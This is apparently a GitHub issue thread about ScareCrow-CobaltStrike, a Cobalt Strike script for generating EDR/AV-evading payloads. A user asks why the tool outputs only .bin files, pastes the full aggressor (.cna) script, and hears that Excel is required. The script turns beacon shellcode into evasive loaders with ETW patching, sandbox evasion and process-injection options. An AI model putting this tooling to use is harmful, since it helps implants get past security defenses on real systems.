search

GeorgePatsias / ScareCrow-CobaltStrike

Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)
MIT License
452 stars 70 forks source link

not sure where to go from .bins #6

Closed tgelliott196 closed 2 years ago

tgelliott196 commented 2 years ago

so every payload is a .bin for me except the dll that doesnt work for me.
dont know what i'm doing wrong. installed on kali, changed paths, loaded cna, dont know what else to do

screenshots.docx

GeorgePatsias commented 2 years ago

Hey, try not to change the name when saving the beacon and let me know if that works with you

tgelliott196 commented 2 years ago

Hey, try not to change the name when saving the beacon, and let me know if that works with you

I'm not changing the name. I click listener, leave stageless, (choices to pick from binary,control,dll,excel,msiexec,or wscript) choice to output for x86exe or x64exe not an option. Then I leave the default domain of www.microsoft.com and click generate. It asks me for a loader name. I leave it blank because not sure what to do here and I click generate. No matter the file type I pick minus .dll it makes a beacon called scbeacon.bin. I thought it was supposed to generate code an exe, create an excel doc, an msi, wscript script, or excel macro. Not sure where to go from scbeacon.bin what to do with it. Or am I missing part of the install or something else?

GeorgePatsias commented 2 years ago

Did you follow the installation guide? and the extra packages needed to do that? Also the configuration? Share me your cna script. Also are you doing the excel loader from linux?

tgelliott196 commented 2 years ago

Did you follow the installation guide? and the extra packages needed to do that? Also the configuration? Share me your cna script. Also are you doing the excel loader from linux?

I did a git clone and followed the readme to install.sh and changed the config paths. Since it was an install.sh I installed on linux. Yes, I'm trying to do excel loader from linux because that is where i have cs installed and Scarecrow-cs.

############################################################

Please do not use / at the end of the directories!

############################################################

Path to the ScareCrow-CobaltStrike repository you just cloned.

$script_path = "/opt/scarecrows/ScareCrow-CobaltStrike";

Path to the compiled ScareCrow Go executable of the installation.

$scarecrow_executable = "/opt/scarecrows/ScareCrow-CobaltStrike/ScareCrow";

Path to the CobaltStrike directory.

$cs_directory = "/opt/cobaltstrike";

Path to the python3 binary.

$python3 = "/usr/bin/python3"; ############################################################

$loader = ""; $domain = ""; $etw = ""; $sandbox = ""; $custom_bin = ""; $loader_name = ""; $shellcode = ""; $injection = "";

menubar("ScareCrow", "scare_crow");

popup scare_crow { item "&Generate Payload" { ScareCrow(); } }

sub ScareCrow { local('$dialog %defaults'); %defaults["domain"] = "www.microsoft.com";

$dialog = dialog("ScareCrow Payload Generator (S)", %defaults, &mainCallback);
dialog_description($dialog, "Generate EDR evasion payloads. (#) for optional, (*) for required options.");
drow_listener_stage($dialog, "listener", "(*) Listener: ");
drow_file($dialog, "custom_binary", "(#) Custom x64 Shellcode: ");
drow_combobox($dialog, "payload_type", "(*) Payload Type: ", @("Stageless"));
drow_combobox($dialog, "architecture", "(*) Architecture: ", @("x64"));
drow_combobox($dialog, "loader", "(*) Loader: ", @("binary", "control", "dll", "excel", "msiexec", "wscript"));
drow_checkbox($dialog, "etw", "(#) Disable ETW patching (enabled by default)");
drow_checkbox($dialog, "sandbox", "(#) Sandbox evasion");
drow_text($dialog, "injection", "(#) Process Injection: ");
drow_text($dialog, "domain", "(*) Domain: ");
dbutton_action($dialog, "Generate Payload");
dbutton_help($dialog, "https://github.com/GeorgePatsias/ScareCrow-CobaltStrike");
dialog_show($dialog);

}

sub loaderDialog { local('$dialog %defaults');

$dialog = dialog("ScareCrow Payload Generator (S)", %defaults, &loaderDialogCallback);
dialog_description($dialog, "Specify JScript loader name for the payload e.g. Loader.js - (**Optional For Control payloads)");
drow_text($dialog, "loader_name", "Loader name: ");
dbutton_action($dialog, "Generate");
dbutton_help($dialog, "https://github.com/GeorgePatsias/ScareCrow-CobaltStrike");
dialog_show($dialog);

}

sub loaderDialogCallback { $loader_name = $3["loader_name"]; GeneratePayload(); }

sub mainCallback { if ($3["listener"] eq "") { show_message("No listener specified!"); exit(); }

$loader = $3["loader"];
$domain = $3["domain"];
$etw = $3["etw"];
$sandbox = $3["sandbox"];
$custom_bin = $3["custom_binary"];
$injection = $3["injection"];

if ($injection ne "" && $etw eq "false"){
    show_message("Cannot use Process Injection and ETW patching together. Disable ETW patching if you want to do a Process Injection");
    exit();
}

if ($custom_bin ne ""){   
    $shellcode_file = openf($custom_bin);
    $shellcode = readb($shellcode_file, -1);
    closef($shellcode_file);
}else{
    $shellcode = artifact_payload($3["listener"], "raw", $3["architecture"]);
}

if ($loader eq "binary"){
    GeneratePayload();
} else if ($loader eq "dll"){
    GeneratePayload();
}else if ($loader eq "control"){
    loaderDialog();
}else if ($loader eq "excel"){
    loaderDialog();
}else if ($loader eq "msiexec"){
    loaderDialog();
}else if ($loader eq "wscript"){
    loaderDialog();
}

}

sub GeneratePayload { prompt_file_save("scbeacon.bin", { show_message("Generating payload, please wait... You can close this dialog while you wait.");

    $handle = openf(">" . $1);
    writeb($handle, $shellcode);
    closef($handle);

    $data = exec($python3 . " " . $script_path . "/Helper.py" . " " . $scarecrow_executable . " " . $1 . " " . $loader . " " . $domain . " " . $cs_directory . " " . $etw . " " . $sandbox . " " . $injection . " " . $loader_name);
    $pythondata = readAll($data);

    show_message("Executable saved to: " . $pythondata);
});

}

println("\n\c9[+]\o Loaded ScareCrow.cna!"); println("\c8[!]\o \$script_path set to '\U$script_path\U'"); println("\c8[!]\o \$scarecrow_executable set to '\U$scarecrow_executable\U'"); println("\c8[!]\o \$cs_directory set to '\U$cs_directory\U'");

GeorgePatsias commented 2 years ago

It needs Excel on your system to work.

tgelliott196 commented 2 years ago

I guess i was confused because the install file is install.sh So, for this to work Cobaltstrike, BASH, and MS office need to be installed on windows? Or will it work with LibreOffice?

GeorgePatsias commented 2 years ago

Ms Office. Read your tools

tgelliott196 commented 2 years ago

unfortunately, work only gave me the Cobalstrike install for Linux and Office is only compatible with win,mac,android.

On Tue, Feb 8, 2022 at 11:05 AM UserX @.***> wrote:

Ms Office. Read your tools

— Reply to this email directly, view it on GitHub https://github.com/GeorgePatsias/ScareCrow-CobaltStrike/issues/6#issuecomment-1032779881, or unsubscribe https://github.com/notifications/unsubscribe-auth/ALSQ2YGRIHDQ72RDVTY2LDLU2E5NPANCNFSM5NSJTTKQ . Triage notifications on the go with GitHub Mobile for iOS https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675 or Android https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub.

You are receiving this because you authored the thread.Message ID: @.***>